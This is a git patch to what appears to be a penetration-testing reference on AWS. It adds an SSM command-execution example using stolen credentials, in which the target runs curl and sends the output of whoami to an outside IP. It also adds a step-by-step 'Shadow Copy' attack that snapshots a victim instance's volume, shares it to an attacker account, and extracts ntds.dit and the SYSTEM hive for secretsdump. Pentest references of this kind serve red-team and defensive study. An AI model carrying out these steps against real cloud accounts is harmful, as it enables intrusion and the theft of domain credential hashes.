From 1f3a94ba88ae16831b7f83c273a3a0ca685025c5 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 6 Mar 2020 15:30:38 +0100 Subject: [PATCH] AWS SSM + Shadow copy attack --- .../Cloud - AWS Pentest.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index 84f624d..bfe25c0 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -18,6 +18,7 @@ * [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) * [AWS - SSM - Command execution](#aws---ssm---command-execution) * [AWS - Golden SAML Attack](#aws---golden-saml-attack) +* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack) * [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) * [PenTest:IAMUser/KaliLinux](#) * [PenTest:IAMUser/ParrotLinux](#) @@ -394,10 +395,24 @@ $ wget -O lambda-function.zip url-from-previous-query --profile uploadcreds ## AWS - SSM - Command execution +:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled. + +SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs): +* Windows Server 2008-2012 R2 AMIs published in November 2016 or later +* Windows Server 2016 and 2019 +* Amazon Linux +* Amazon Linux 2 +* Ubuntu Server 16.04 +* Ubuntu Server 18.04 +* Amazon ECS-Optimized + ```powershell $ aws ssm describe-instance-information --profile stolencreds --region eu-west-1 $ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds $ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds + +e.g: +$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1 ``` ## AWS - Golden SAML Attack @@ -419,6 +434,28 @@ $ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 ``` +## AWS - Shadow Copy attack + +Prerequisite: +* EC2:CreateSnapshot +* CloudCopy - https://github.com/Static-Flow/CloudCopy + +1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions +2. Run `"Describe-Instances"` and show in list for attacker to select +3. Run `"Create-Snapshot"` on volume of selected instance +4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account +5. Load AWS CLI with Attacker Credentials +6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot +7. Ssh run `"sudo mkdir /windows"` +8. Ssh run `"sudo mount /dev/xvdf1 /windows/"` +9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"` +10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"` +11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"` +12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"` +13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"` +14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path + + ## Cover tracks by obfuscating Cloudtrail logs and Guard Duty :warning: When using awscli on Kali Linux, Pentoo and Parrot Linux, a log is generated based on the user-agent.